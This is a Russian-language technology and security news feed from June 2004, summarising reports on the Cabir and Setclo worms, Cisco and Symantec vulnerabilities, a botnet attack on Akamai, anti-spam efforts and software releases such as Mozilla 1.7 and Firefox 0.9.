22/06/2004 11:41 Недельный отчет о вирусах Panda Software
В еженедельном отчёте, выпущенном Panda Software описан (естественно) Cabir, первый червь, способный распространяться через мобильные телефоны (впрочем, это довольно спорное утверждение), два троянца - StartPage.FH и Downloader.HC, а также программа-шутка Argen.
Отчёт

22/06/2004 11:28 Червь Setclo поражает локальные сети
Компания Network Associates в понедельник, 21 июня, зафиксировала появление нового вируса, получившего название Setclo, сообщает "Компьюлента". При проникновении на компьютер вредоносная программа размером в 16384 байта модифицирует реестр, обеспечивая себе автоматическую загрузку при каждом старте операционной системы. Далее вирус создает файлы Setup.exe, содержащие копии кода червя, в корневых каталогах всех доступных сетевых ресурсов. Кроме того, в эти же каталоги вирус помещает файлы Autorun.inf, пытаясь, тем самым, задействовать функцию автозапуска ОС Microsoft Windows. Компания Network Associates присвоила Setclo рейтинг низкой опасности.
Описание

22/06/2004 10:22 Защитные обои для сетей Wi-Fi
Британская компания BAE Systems, специализирующаяся на заказах для Министерства обороны, разработала маскирующие обои, которые препятствуют подслушиванию сетей Wi-Fi. Компания выпустила панели, предназначенные для предотвращения возможности перехвата Wi-Fi трафика извне, но пропускающие другой трафик, в том числе радио и сигналы мобильных телефонов. Панели FSS (Frequency Selective Surface) изготавливаются так же, как печатные платы — из полимера каптон с прослойками из медной фольги. Подобные материалы применяются для самолетов-«невидимок». Эти панели поставляются в двух вариантах: пассивном — постоянно включенном, и активном — когда разные области можно включать и выключать для расширения или сужения зоны действия сети. Панели имеют толщину от 50 до 100 мкм, и их можно наклеивать на любую поверхность, включая стекло. Представитель компании утверждает, что они помогают понизить уровень «шума» в зданиях, где расположены офисы нескольких компаний со своими собственными локальными сетями.
Подробности

21/06/2004 22:16 История языков программирования
Издательство O'Reilly выпустило цветной плакат "The History of Programming Languages" (можно скачать в PDF формате) в котором на оси времени обобщена история развития 50 языков программирования, сообщает opennet.ru. Всего за последние 50 лет, было создано около двух с половиной тысяч языков программирования.
Постер
GIF-версия

21/06/2004 20:33 Sprint и SUNET поставили новый рекорд скорости передачи данных
Американскому интернет-провайдеру Sprint и Шведской национальной исследовательской и образовательной сети (SUNET), кажется, удалось побить очередной рекорд скорости передачи данных через интернет. Рекордный эксперимент был проведен еще в апреле этого года, когда Sprint и SUNET удалось менее чем за 27 минут передать на расстояние 16346 километров около 840 гигабайт данных, однако заявка была сделана лишь в конце прошлой недели. Средняя скорость передачи составила 4,23 гигабита в секунду или же 69037 терабит/метров в секунду (произведение скорости передачи на расстояние).Таким образом, американо-шведской команде удалось побить рекорд, поставленный в апреле учеными из Калифорнийского технологического института и CERN. Несмотря на то, что средняя скорость, поставленная конкурентами, достигла тогда 6,25 гигабит в секунду, данные передавались лишь на 11 тысяч километров.
Internet.Ru

21/06/2004 20:19 Потери Украины от вирусных атак только в 2003 г. составили $1,5-2 млн.
По мере развития информационных технологий и в условиях всеобщей компьютеризации вопрос защиты информации и компьютерной безопасности становится все более насущным. По мнению Дмитрия Зараховича, директора по развитию бизнеса компании «ЦЕБИТ», защита информации в современных условиях превращается из экономического вопроса в вопрос политический. Ведь только в прошлом году, по приблизительным оценкам, потери Украины от вирусных атак составили $1,5-2 млн. «Потери от вирусных атак в прошлом году составили около $16 триллионов, из которых порядка $1,5-2 млн., по нашим оценкам, украинские», - сообщил Дмитрий Зарахович в пятницу на пресс-конференции, посвященной открытию Авторизированного Центра Обучения и Сертификации «ЦЕБИТ». По его словам, во время последней эпидемии в Украине за ночь приходилось около 80 атак на одно предприятие. И сейчас, когда страсти уже поутихли, при подключении к Интернет практически каждые 12 мин. производится атака на компьютер. Основной интерес, при этом, представляют не домашние ПК, а корпоративные сети.
Crime-Research.ru

21/06/2004 20:07 Дыра в Symantec Enterprise Firewall
Компания Secunia предупреждает о наличии дыры в брандмауэрах Symantec Enterprise Firewall версий 7.х и 8.х (возможно, и более поздних релизов), сообщает "Компьюлента". Используя уязвимость, злоумышленники, теоретически, могут испортить информацию в кэше сервера имен (DNS), внедрив в него произвольные данные. Это позволяет перенаправлять пользователей на вредоносные веб-сайты или же полностью запрещать посещение определенных онлайновых ресурсов. Специалисты Secunia присвоили дыре рейтинг средней опасности, заплатки, ликвидирующей уязвимость, на сегодняшний день не существует.
Описание

21/06/2004 19:44 Крупнейшая атака на правительственные сайты Южной Кореи
В конце прошлой недели электронные ресурсы правительства Южной Кореи подверглись массированной хакерской атаке. Неизвестному удалось заразить вирусом более 64 компьютеров, том числе сайт Министерства обороны Южной Кореи. О проведенной атаке сообщил в субботу Южнокорейский центр кибербезопасности (NCSC). По официальным данным, хакеру удалось инфицировать с помощью троянской программы Peep Trojan компьютеры Агентства по разработке средств защиты, которое занимается разработкой вооружений, Института по атомной энергии, а также вывести из строя несколько правительственных сайтов (в частности, порталы Морского министерства и Морской полиции Южной Кореи). Вирус Peep Trojan был обнаружен в начале этого года, а его автор, тридцатилетний тайванец Ван Пин-ань был арестован в мае. После того как атака была обнаружена, специалисты NCSC приняли экстренные меры, блокировав сайт, на который вирусы должны были отослать конфиденциальную информацию. Саму утечку удалось предотвратить. Между тем, о домене, с которого осуществлялась атака, ничего не упоминается.
Подробнее

21/06/2004 19:32 Американский Конгресс готовит закон по борьбе с «бэкдор-утилитами»
Члены комитета Палаты представителей США по энергетике и торговле единогласно утвердили законопроект, ограничивающий распространение программ скрытного удаленного доступа, сообщает Reuters. Согласно положениям нового закона, создатели «бэкдор-утилит» должны будут предупреждать пользователей о том, что на их компьютеры устанавливается новое программное обеспечение. По словам председателя парламентского комитета Джо Бартона (Joe Barton), проект очень быстро будет одобрен Конгрессом и станет полноценным законом уже в этом году. Закон позволит Федеральной комиссии по торговле взыскивать многомиллионные штрафы с тех, кто внедряет на чужие компьютеры программы для считывания данных с клавиатуры. Кроме того, американские законодатели потребовали, чтобы авторы «бэкдор-утилит» позволяли пользователям легко удалять их. «Мы по-прежнему встречаем людей, которых лишили их собственных сайтов. Некоторые пользователи столкнулись с нарушением в работе браузеров или с тем, что их дети получили возможность смотреть недоступные для них материалы с помощью программ удаленного доступа», - рассказал один из конгрессменов. Между тем, инициатива конгрессменов пока не нашла одобрения в Федеральной комиссии по торговле. Ее руководители заявили, что уже имеют юридическую базу для борьбы с подобными программами, а новый закон может стать серьезной проблемой для производителей легальных утилит удаленного администрирования.
Источник

21/06/2004 19:18 Новый метод оценки суперкомпьютеров
Решение производителей ПК отказаться от одной простой меры быстродействия для демонстрации производительности компьютеров подхватили в мире суперкомпьютеров. Однако не все приветствуют эти перемены. Организатор рэнкинга суперкомпьютеров Top500 разработал более широкий комплекс тестов, измеряющих многие параметры производительности машин. Сейчас для ранжирования систем в списке Top500, публикуемом с большой помпой дважды в год, используется математический тест Linpack. В мире настольных ПК, где повышение тактовой частоты процессора на 20% редко приводит к 20%-му ускорению работы системы в целом, аналогичный отход от простых, но потенциально вводящих в заблуждение цифр уже произошел. В 2002 году AMD отказалась от указания быстродействия в гигагерцах. А этой весной аналогичный шаг для своих чипов Pentium и Celeron совершила Intel. Некоторых производителей, таких как Cray, спонсируемый правительством комплекс тестов для суперкомпьютеров, называемый HPC Challenge Benchmark, обрадовал. Однако IBM, которая агрессивно рвется на рынок суперкомпьютеров и все чаще мелькает в списке Top500, отнеслась к нему настороженно. Новый комплекс из семи тестов не заменит Linpack в качестве меры для Top500, говорит Донгарра. Во-первых, этот тест, которому уже десять лет, позволяет производить исторические сравнения в сфере высокопроизводительных вычислений (high-performance computing, HPC), а во-вторых, система, не способная получить высокой оценки по Linpack, не сможет хорошо работать и в других тестах. Новые тесты стали результатом реализации программы правительства США, напуганного японским суперкомпьютером Earth Simulator, который лидирует в Top500 с 2002 года. Программа, финансируемая агентством DARPA (Defense Advanced Research Projects Agency), принесла гранты на разработку новых конструкций суперкомпьютеров IBM, Cray и Sun Microsystems.
Подробнее

21/06/2004 18:54 Обновленный сайт Путина стал более "личным"
Официальный интернет-сайт президента Российской Федерации Владимира Путина в воскресенье изменил свой дизайн, сообщает РИА "Новости". Новый сайт разрабатывался в течение трех месяцев. Он открылся (по старому адресу) 20 июня 2004 года - ровно через два года после того, как появилась его первая редакция, через год после появления английской версии и через шесть месяцев после появления президентского сайта для школьников. В новой редакции интернет-представительства президента изменился не только дизайн, но и структура сайта. Появился раздел "Личное", для упрощения навигации был обновлен раздел "О сайте". Кроме того, в раздел "Назначения" были занесены все чиновники, назначенные президентом, причем их имена не будут пропадать, даже если их уволят с занимаемой должности. Изменениям подверглись и другие разделы. Стоимость работ по обновлению сайта составила шесть миллионов рублей. Финансирование проекта производилось в рамках Федеральной целевой программы "Электронная Россия". В дальнейшем на поддержку ресурса будут выделяться средства из бюджета администрации президента и ГУИР ФСО. Безопасность сайта обеспечивает Центр безопасности связи ФСБ РФ, в который будет поступать вся информация о попытках его взлома.
Источник

21/06/2004 18:39 В России осужден первый спаммер
Как сообщает Bugtraq.ru, 20 июня 2004 года вступил в законную силу первый в истории России приговор лицу, рассылавшему спам. Спамер был признан виновным в совершении деяния, предусмотренного статьей 273 Уголовного кодекса РФ, и приговорен к 1 году лишения свободы условно и уплате штрафа в размере 3.000 рублей. "Вещественное доказательство - жесткий диск системного блока компьютера хранить при уголовном деле." Правда, на самом деле речь идет не о привычном спаме. Летом 2003 года житель Челябинска Андросов Д.И. использовал скрипт, предназначенный для рассылки SMS-сообщений клиентам ЗАО "Уральский GSM", в результате двух с половиной часов работы которого около 15 тысяч абонентов получили "sms-сообщения нецензурного содержания". Любопытно, что, хотя основными пунктами обвинения являются нарушение работы сети и блокирование информации, в список вошел и "перенос информации с одного машинного носителя на другой (рассылка)", что как раз и позволяет говорить о первом приговоре спаммеру.
Подробнее

18/06/2004 15:38 А был ли хакер?
Уязвимая конфигурация клиентского программного обеспечения и точек доступа беспроводных локальных сетей (WLAN), станет причиной 70% успешных атак, проведенных хакерами против корпоративных сетей до 2006 года. По информации компании Gartner, безопасность беспроводных сетей и подключенных к ним PDA-устройств должна обеспечиваться за счет усовершенствования политик безопасности, учитывающих особенности современных тенденций в области корпоративной связи и смещению понятия «рабочего места». «Независимо от того, как хакеры будут внедряться в беспроводную сеть компании – через незащищенную точку доступа или через рабочую станцию, – если им удастся попасть в сеть, их присутствие будет чрезвычайно сложно отследить, поскольку они вовсе не обязательно будут «лично» присутствовать на территории офиса компании или поблизости от него, – заявил Джон Пескаторе, вице-президент Gartner. – Умудренные опытом сетевые злоумышленники будут вести себя предельно осторожно и стремиться использовать ресурсы компании незаметно – таким образом, что их, возможно, никогда не удастся обнаружить». Gartner рекомендует компаниям в целях безопасности убедиться в том, что реализованные ими системы беспроводного подключения настроены в соответствии со всеми нормами и требованиями к безопасности, так что сотрудники или злоумышленники не имеют возможности самовольно подключать к сети собственные, «персональные» точки доступа. В густонаселенных районах, таких как жилые городские кварталы, или в местах расположения многоэтажных офисных зданий, где одновременно находятся самые разные организации, компаниям нужно также убедиться в том, что их пользователи не подключаются к сетям других компаний. Наиболее простой и наименее эффективный способ убедиться в этом – купить карманное устройство для контроля за линиями беспроводной связи (wireless sniffer) и обойти с ним всю сеть по периметру. Однако не стоит пренебрегать гораздо более надежными средствами мониторинга беспроводной активности, отмечает Gartner.
Сетевой online

18/06/2004 14:12 Уязвимость в Cisco IOS
В операционной системе IOS, использующейся в качестве программной платформы для большинства маршрутизаторов и коммутаторов Cisco, обнаружена очередная уязвимость. Проблема связана с неправильной обработкой BGP-пакетов (Border Gateway Protocol). Для реализации нападения злоумышленнику достаточно послать сформированный особым образом запрос, который вызовет перезагрузку уязвимого устройства. Повторная отправка таких запросов может спровоцировать DoS-атаку. Ошибка присутствует во всех версиях операционной системы IOS. Выпущены обновления.
Подробности

18/06/2004 13:42 Вышла Mozilla 1.7
17 июня была выпущена окончательная версия коммуникационного пакета Mozilla 1.7. Выходу этого варианта предшествовали три релиз-кандидата, что является для проекта Mozilla своеобразным рекордом. Обычно тестирование ограничивается одним релиз-кандидатом, а то и вовсе бета-версией. В случае же с версией 1.7 тестирование явно затянулось, и интегрированный вариант Mozilla 1.7 вышел даже позже новых версий браузера Firefox и почтового клиента Thunderbird, которые разрабатывались одновременно с Mozilla 1.7 и имеют с этим пакетом много общего кода. Практически все нововведения Mozilla 1.7 известны пользователям по релиз-кандидатам. Это возможность показа паролей текстом, а не звездочками в соответствующих полях форм, возможность отключать скрипты, не дающие пользоваться контекстным меню браузера, новый набор иконок, а также поддержка базовых функций по загрузке файлов на FTP-серверы и усовершенствованная система блокировки всплывающих окон. В почтовым клиенте появилась поддержка аутентификации MSN и протокола SSPI NTLM, улучшенная синхронизация с наладонниками Palm, усовершенствованные фильтры спама. Ряд улучшений реализованы и в IRC-клиенте Chatzilla.
Скачать (12 МБ)

18/06/2004 13:01 Ветеран Сети призывает принять стандарт идентификации e-mail
Первый шаг в преодолении эпидемии спама — сделать виновников массовой рассылки опознаваемыми, сказал один из архитекторов интернета Винт Серф. Серф, участвовавший в создании TCP/IP (Transmission Control Protocol/Internet Protocol), а сейчас директор по корпоративной стратегии компании MCI, выступил на открытии первой конференции Email Technology Conference в Сан-Франциско. Главной темой двухдневной конференции был спам. Серф сказал, что стандартизованные методы аутентификации отправителей e-mail непременно приведут к успеху фильтрации, технологии для которой разрабатывают многие участники конференции. «Интересно накопить критическую массу механизмов подобного рода, — сказал он. — Такой подход будет самым продуктивным». Раньше Серф в шутку предлагал устроить спамерам публичную порку. С момента отправки первого электронного письма в 1971 году спам достиг невероятных размеров. Тогда, как отметил Серф в своей презентации по истории интернета, по e-mail переписывались всего несколько гиков, так что рассылать незатребованную коммерческую почту было просто некому. В 1989 году, когда появились первые коммерческие интернет-сервис-провайдеры, включая UUnet и PSINet, условия для этого появились. Теперь, по оценкам антиспамерской компании Brightmail, 64% всей электронной почты приходится на непрошеную массовую рассылку. Серф рекомендует в качестве средства шифрования и верификации отправителей цифровые подписи, которые эффективно применяет его компания MCI. Цифровые подписи, или уникальные коды, присваиваемые каждому пользователю, прикрепляются к сообщениям и должны быть подтверждены, прежде чем сообщения будут отправлены. Однако широкое применение такой системы, по его словам, затруднено из-за отсутствия центрального надгосударственного органа, регламентирующего технологию.
Подробности

18/06/2004 12:09 Napster привлекает клиентов бесплатными аудиоплейерами
Компания Napster, занимающаяся платным распространением музыки, предлагает будущим клиентам аудиоплейер при заключении годового контракта, сообщает Reuters. Любой пользователь, заключивший контракт стоимостью 119,40 доллара, получает компактный mp3-плеер Rio Chiba Sport емкостью 128 мегабайт. Впрочем, доплатив еще 80 долларов, пользователь получит уже более серьезную модель Rio Nitrus емкостью 1,5 гигабайта. На сегодняшний день легальный Napster продал клиентам около 10 миллионов композиций. Компания Napster, использующая название закрытой в результате судебного процесса популярной файлообменной сети, начала работу 29 октября 2003 года. Позже она была приобретена известным производителем программного обеспечения Roxio. На сегодняшний день легальный Napster предоставил клиентам около 10 миллионов композиций.
Lenta.ru

17/06/2004 18:06 Выход июньского номера Crypto-Gram
По традиции, 15 июня вышел очередной, июньский, номер электронного журнала, посвящённого сетевой безопасности и криптографии Crypto-Gram. В номере: Breaking Iranian Codes, Biometric IDs for Airport Employees, Crypto-Gram Reprints, Microsoft and SP2, News, Cell Phone Jamming and Terrorist Attacks, Photographing Subways and Terrorist Attacks, Counterpane News, The Witty Worm, Comments from Readers.
Crypto-Gram

17/06/2004 15:17 "МТУ-Интел" (Москва) будет бесплатно подключать к "Стриму" студентов
Вчера, 16 июня 2004 г., компания "МТУ-Интел" (Москва) объявила о проведении акции для студентов столичных ВУЗов, закончивших последний семестр без троек. В течение срока действия акции, которая завершится 31 июля, студенты, сдавшие летнюю сессию только на "хорошо" и "отлично", будут подключаться к домашнему ADSL-каналу "Стрим" бесплатно. Чтобы воспользоваться этим предложением, необходимо в любом из офисов «МТУ-Интел» при покупке комплекта оборудования «Стрим» предъявить зачетную книжку и любой документ, удостоверяющий личность. На практике это означает, что абоненты, подключающиеся в рамках данной акции, будут освобождены от инсталляционного платежа $50, и полная стоимость подключения для них составит $99 либо $149 (в зависимости от типа выбранного оборудования).
О "Стриме"

17/06/2004 14:39 «Яндекс» — главный враг ФСБ
Министры европейских стран, руководители спецслужб, а также эксперты по интернету из разных стран (например, Антон Носик) собрались на специальной встрече ОБСЕ, чтобы обсудить проблемы нетерпимости в интернете. Возрастающее количество так называемых «сайтов ненависти», распространение в интернете ксенофобии, антисемитской и расистской пропаганды — эти проблемы всерьез беспокоят правительства европейских стран. Что же делать в ситуации, когда с каждым годом поток грязи в интернете нарастает, а, например, немецкие нацисты уже приступили к массовым рассылкам спама? Эта и другие проблемы обсуждаются на специальной двухдневной конференции, которая началась в Париже 16 июня. Конференция проводится Организацией по безопасности и сотрудничеству в Европе (ОБСЕ) при содействии МИД Франции. Как сообщает присутствующий на конференции Антон Носик, российская делегация состоит из шести представителей: «двое из МИДа, трое из ФСБ, и ваш покорный слуга». Антон Носик на страницах Livejournal уже высказал свое отношение к выступлению г-на Остроухова, который возглавляет российскую делегацию. Мы же лишь еще раз акцентируем внимание на одном интересном аспекте: в официальных документах конференции ОБСЕ руководитель департамента ФСБ фигурирует как «академик РАЕН, доктор юридических наук, профессор». Несмотря на подобную «конспирацию», доклад профессора на тему «Пропаганда терроризма и ксенофобии в телекоммуникационных сетях общего пользования (интернет)» является чрезвычайно откровенным текстом, хотя и не совсем соответствует тематике конференции. В своем выступлении В. В. Остроухов подчеркнул, что в интернете функционируют сайты, непосредственно распространяющие идеи экстремизма, сепаратизма и терроризма. Эти сайты, по мнению В. В. Остроухова, являются самыми опасными для нашей страны. По информации ФСБ, «информационная поддержка бандформирований действующих на территории Чеченской республики осуществляется через сайты www.chechenpress.com; www.kavkazcenter.com; www.kvestnik.org; www.kavkaz.org; www.daymohk.info; www.chechnya.nl и др. А, к примеру, сбор средств в их пользу осуществляется на сайте www.angelfire.com/wy/sadagah при помощи системы баннеров (рекламных ссылок-картинок)». Из выступления В. В. Остроухова можно сделать вывод, что главным врагом ФСБ является поисковая система «Яндекс», а весь интернет лучше бы вообще закрыть, или, в крайнем случае, не пускать туда без специального удостоверения.
Подробнее

17/06/2004 14:05 Крупные компании объединяются для борьбы с интернет-мошенниками
Около десятка крупных финансовых, телекоммуникационных и технологических компаний сформировали специальную группу для противостояния интернет-мошенничеству типа «рыбалка» (в ряде российских СМИ его называют «фишинг»). По информации Reuters, новое объединение получило название Trusted Electronic Communications Forum. В его задачу будет входить разработка стандартов для противостояния «рыбалке» и воровству идентификационных данных. «Рыбалка» предусматривает рассылку по электронной почте посланий от имени крупных компаний. Авторы фальшивых писем просят адресатов сообщить свои персональные сведения. Как правило, свой интерес мошенники объясняют сбоями в корпоративных сетях или необходимостью обновления баз данных. В состав нового форума вошли AT&T Wireless Services, Charles Schwab, DirecTV Group и IBM. К настоящему времени в одних только США письма от мошенников получили 57 млн пользователей.
VirusList

17/06/2004 13:21 Обновления из сервис-пака к Windows XP появятся и для других продуктов Microsoft
Компания Microsoft намерена реализовать ряд важных нововведений из второго сервис-пака к Windows XP в обновлениях к своим более ранним продуктам, сообщает издание Microsoft Watch. Официальных подтверждений этому пока нет. Известно лишь, что многие изменения, заложенные в долгожданном обновлении к Windows XP, появятся и в первом сервис-паке к Windows Server 2003. С более старыми продуктами все менее очевидно. Представители Microsoft отказываются сообщать конкретную информацию о возможных обновлениях для более ранних версий своих операционных систем или для браузера Internet Explorer. Представители компании говорят о том, что конкретных планов по выпуску таких обновлений у компании нет, однако такая возможность рассматривается. Со ссылкой на свои источники в Microsoft Watch отмечают, что, в Microsoft могут отказаться от выпуска сервис-пака для Internet Explorer 6, а вместо этого реализовать нужные изменения в обновлениях для операционных систем. В частности, такие изменения могут появиться в Service Pack 5 для Windows 2000. С более ранними версиями Windows ситуация сложнее, так их поддержка либо прекращена, либо сроки поддержки подходят к концу.
"Компьюлента"

17/06/2004 12:47 ПК-зомби атаковали крупнейшие сайты
Как утверждает компания Akamai Technologies, обслуживающая инфраструктуру интернета, в атаке, вырубившей в начале этой недели веб-сайты Google, Yahoo и другие порталы, применялась bot net — крупная сеть зомбированных домашних ПК. Во вторник в продолжение двух часов был почти полностью заблокирован доступ к веб-сайтам Apple Computer, Google, Microsoft и Yahoo — похоже, в результате атаки, обрушившейся на эксплуатируемые Akamai главные серверы системы доменных имен (DNS). Поток данных был «столь мощным, что он не мог исходить от пары серверов, — говорит главный специалист и соучредитель Akamai Том Лейтон. — Нам вместе с нашими партнерами удалось выявить бот-сеть и заблокировать ее, что привело к прекращению атаки». Бот-сети представляют собой множество компьютеров, взломанных при помощи специального ПО. Bot, или иначе программа троянского коня с дистанционным доступом (remote-access Trojan horse, RAT), находит и обживает уязвимые ПК. Затем он втихомолку функционирует в фоновом режиме, позволяя атакующему посылать в систему команды, пока ничего не подозревающий пользователь продолжает работать. По существу, эти компьютеры превращаются в зомби, управляемые на расстоянии. Последние версии бот-ПО позволяют атакующим управлять компьютерами-жертвами и выводить из них информацию через чат-серверы и файлообменные сети. Затем таким ПК можно подать команду на заражение или блокирование других компьютеров. Эксперты считают бот-сети смертельной опасностью для интернета. Участвовавший в расследовании специалист, попросивший не называть его имени, подтвердил, что данная атака DDoS, вероятно, исходит от чрезвычайно крупной бот-сети. «Если это бот, то он очень хорошо написан, и сеть очень большая, — сказал он. — Насколько мы можем судить, все выглядит как реальный и легитимный трафик». Хотя атака была нацелена на вывод из строя четырех крупных веб-сайтов, Лейтон из Akamai утверждает, что мишенью была его компания. «В целом очевидно, что эта атака направлена на некоторых наших заказчиков. Мы полагаем, что таким способом они атаковали Akamai». Пока не ясно, как атаку DDoS удалось сделать настолько избирательной, чтобы она сосредоточилась на главных сайтах Yahoo, Google, Microsoft и Apple.
ZDNet

17/06/2004 11:53 "Мобильный вирус" не так опасен, как кажется
Первый вирус для мобильных телефонов Cabir не представляет большой опасности, передает Reuters. К такому выводу пришли специалисты компаний-разработчиков антивирусных продуктов и операционной системы Symbian, подверженной заражению этим вирусом. Помимо того, что Cabir не осуществляет никаких деструктивных действий, слабым местом вируса является то, что для его распространение пользователи мобильных телефонов с Symbian OS должны собственноручно одобрить установку вируса на свою систему. Матиас Импиваара (Matias Impivaara), представитель финской компании F-Secure, специализирующейся на компьютерной безопасности, считает, что подобные вирусы станут действительно опасными только тогда, когда смогут распространяться без помощи пользователей. "Поворотной точкой станет момент, когда создатели вирусов будут знать систему достаточно хорошо для того, чтобы находить в ней дыры, - сказал Импиваара. - Информация о Symbian OS вполне доступна для создателей вирусов, появление вируса Cabir может привести к тому, что они просто раньше обратят свое внимание на новые возможности". Представители компании Symbian, со свой стороны, заявил, что, в отличие от персональных компьютеров, в операционную систему мобильных телефонов нельзя проникнуть без согласия пользователя.
Подробности

17/06/2004 10:41 Firebox от Rainbow Technologies получил сертификат Гостехкомиссии
Компания Rainbow Technologies сообщает о том, что программно-аппаратный комплекс WatchGuard Firebox V class получил сертификат Гостехкомиссии РФ по 3-му классу защищённости. Сертификат №909 действителен до 20 мая 2007 года. Документ подтверждает, что семейство этих продуктов обеспечивает надёжную защиту от несанкционированного доступа к конфиденциальной информации в сетях передачи данных на основе TCP/IP-протокола. Напомним, что программно-аппаратные комплексы WatchGuard Firebox V class представляют собой высокопроизводительные устройства интегрированной защиты, ориентированные на предприятия среднего и крупного бизнеса, их удаленные офисы, на технологические площадки провайдеров и на сетевые сегменты центров обработки данных. Устройства WatchGuard Firebox V class, построенные на ASIC-архитектуре, включают такие функции как Proxy-фильтрация, защита от хакерских атак, создание VPN, поддержка Quality of Service, VLAN, балансировка нагрузки на сервера (до 16 серверов) и поддержка динамической маршрутизации трафика.
Источник: Rainbow Technologies

17/06/2004 10:35 Антивирус Microsoft не будет включен в OS Windows
Руководитель подразделения Microsoft по обеспечению безопасности бизнеса Майк Нэш (Mike Nash) сообщил, что его компания ведет разработку программного продукта, предназначенного для защиты пользователей Windows от червей и вирусов. Отвечая на вопрос о том, как это скажется на уже существующих антивирусных компаниях, г-н Нэш, заявил, что Microsoft намеревается продавать свой антивирус как отдельный продукт. Пока никакой информации о сроках его появления не сообщалось. Конкуренты давно опасались, что Microsoft попытается включить антивирусное ПО в операционную систему Windows, что крайне негативно сказалось бы на продажах их собственных решений. Компания Symantec, в свою очередь, заявила, что приветствует честную конкуренцию и одобряет принятое Microsoft решение о продажах собственного ПО отдельно от Windows.
За основу для разработки собственного антивируса Microsoft взял технологию румынской компании GeCAD Software Srl., приобретенную еще в прошлом году.
Источник

16/06/2004 13:06 История развития клавиатур
На сайте небезызвестного Артемия Лебедева опубликована довольно интересная статья под названием "Трагедия запятой" в рамках его проекта "ководство". Статья посвящена истории развития лавиатур, а также различных раскладокклавиатур (в том числе и русских). Рекомендуем прочитать - довольно хорошо написано.
Cтатья

16/06/2004 12:50 Неполадки на серверах Akamai потрясли всю Сеть
Неполадки на DNS-серверах компании Akamai привели к временной недоступности таких крупных ресурсов, как Google, Yahoo, Microsoft и массы других сайтов. Как сообщает Internet Storm Center, проблемы начались где-то в 12:30 по Гринвичу (16:30 мск), когда пользователи по всему миру вдруг не смогли достучаться до Google, Yahoo, Microsoft, Apple, Federal Express и других, не менее значительных серверов. Несмотря на то, что на сайт можно было зайти, набрав в адресной строке что-нибудь типа «apple.com», добавление к адресу привычного «www» приводило браузер в состояние легкого ступора. Администраторам некоторых пострадавших сайтов потребовалось около двух часов для того, чтобы перевести свои DNS-записи с серверов Akamai на собственные машины, но часть ресурсов, как вы понимаете, до сих пор недоступна для посетителей или же открывается со второго раза на третий. Что творится с Akamai, на долю которой приходится до 15% всего сетевого трафика, пока не ясно: DNS-машины компании отвечают на пинги, но отказываются обслуживать DNS-запросы. Сотрудники журнала The Register, таки дозвонившиеся до отдела обслуживания компании, говорят, что техники Akamai сами не вполне представляют себе причину постигшей сервис катастрофы и не могут точно сказать, когда же возобновится его нормальная работа.
Internet.Ru

16/06/2004 12:36 Новые версии Mozilla Firefox и Mozilla Thunderbird
Ну вот - дождались. Сообщество разработчиков Mozilla.org выпустило новые версии программ, которые в будущем станут основой платформы Mozilla, сообщает "Компьюлента". 15 июня были выпущены новые версии обеих этих программ. Браузер Mozilla Firefox обновился до версии 0.9 (на прошлой неделе был выпущен соответствующий релиз-кандидат). Главными нововведениями в Firefox 0.9 стала поддержка миграции с предшествующих версий Firefox и Mozilla 1.x, Netscape, Opera и Internet Explorer. Пользователь может импортировать в Firefox закладки, файлы cookie, историю посещенных страниц и даже пароли. Кроме этого, в версии 0.9 появилась система автоматических обновлений SmartUpdate, новая интерфейсная тема (как уже отмечалось, не слишком удачная), а размер дистрибутива для Windows сократился до 4,8 Мб. Что касается Mozilla Thunderbird, то этот замечательный почтовый клиент обновился до версии 0.7 RC1, то есть до выхода полноценной версии 0.7 осталось ждать совсем не долго. Это означает, что разработчики трудятся ударными темпами - версия Thunderbird 0.6 была выпущена в начале мая. В Thunderbird 0.7 используется тот же менеджер расширений, что и в Firefox, что обеспечивает унификацию расширений для почтового клиента и браузера. Кроме этого, в почтовой программе реализован интерфейс для управления несколькими учеными записями почты в рамках одного пользовательского профиля (в Mozilla этот момент был традиционно "больным местом") и новый интерфейс для управления самими профилями. Небольшие исправления и доработки были внесены в систему фильтрации спама, улучшилась поддержка IMAP через SSL-соединения.
О новой версии Firefox

16/06/2004 12:04 Новый новостной сайт по безопасности
Сообщаетя об открытии нового новостного сайта, который будет собирать информацию в формате RSS c многих новостных сайтов (более 30) представлять её в режиме реального времени в виде модных в Интернет блогов. Сайт называется InfoSec News Blog. Новости представлены по категориям: Business, Encryption, Government, Legal / Law, Hacks, Worms, Bugs, Social Engineering, Wireless, General InfoSec News.
infosec.volubis.com/

16/06/2004 11:30 Вышел Release Candidate 2 второго сервис-пака для Windows XP
Компания Microsoft выпустила очередную предварительную версию второго сервис-пака для операционной системы Windows XP, сообщает "Компьюлента". Новая версия имеет статус Release Candidate 2, то есть уже весьма близка к окончательной версии. Впрочем, это же говорилось и о выпущенной в марте версии Release Candidate 1. Однако по итогам ее тестирования было принято решение о выпуске очередной промежуточной версии сервис-пака и о переносе срока выхода его окончательного варианта с середины лета на третий квартал нынешнего года. По информации Neowin, второй релиз-кандидат имеет номер версии 5.1.2600.2149. Пока обновление доступно только официальным бета-тестерам, его можно загрузить с сайта Microsoft. Сервис-пак в варианте для сетевой установки имеет размер 264,36 Мб. Пока имеется только англоязычная версия сервис-пака. О том, будет ли второй релиз-кандидат выпущен для публичного бета-тестирования, пока неизвестно.
news.com.com

16/06/2004 11:18 В Белоруссии начали штрафовать за ссылки в интернете
Отныне в Белоруссии суды будут штрафовать веб-дизайнеров за размещение ссылок на объекты авторского права, в том числе и на песни в формате mp3, которые находятся на других серверах. На прошлой неделе один из районных судов Минска приговорил автора фан-сайта ансамбля "Песняры" Федора Короленко к штрафу в размере трех базовых величин (около 25 долларов США) за размещение ссылок на mp3-файлы. Иск против фаната "Песняров" был подан Республиканским унитарным предприятием интеллектуальной собственности (РУПИС) по просьбе композитора "Песняров" Игоря Лученка и вдовы одного из лидеров коллектива Владимира Мулявина. По сути, Ф.Короленко обвинялся в аудиопиратсве в форме размещения на сайте ссылок, ведущих на композиции "Песняров". Во время судебных слушаний выяснилось, что сами файлы размещались на других серверах, но это нисколько не смутило адвокатов обвинения. Более того, представители РУПИС утверждали, ссылаясь на закон об авторском праве, что даже публикация простого списка названий песен является нарушением закона и подлежит судебному преследованию, поскольку название - это часть песни, а ее использование без согласования с авторами запрещено. Скорее всего, стремление защитников интеллектуальной собственности покарать веб-дизайнера объясняется их собственными коммерческими интересами. Дело в том, что сам РУПИС является издателем двойной пластинки произведений Игоря Лученка в исполнении "Песняров".
Подробности

16/06/2004 11:01 Владелец патента предъявляет права на технологию загрузки программ
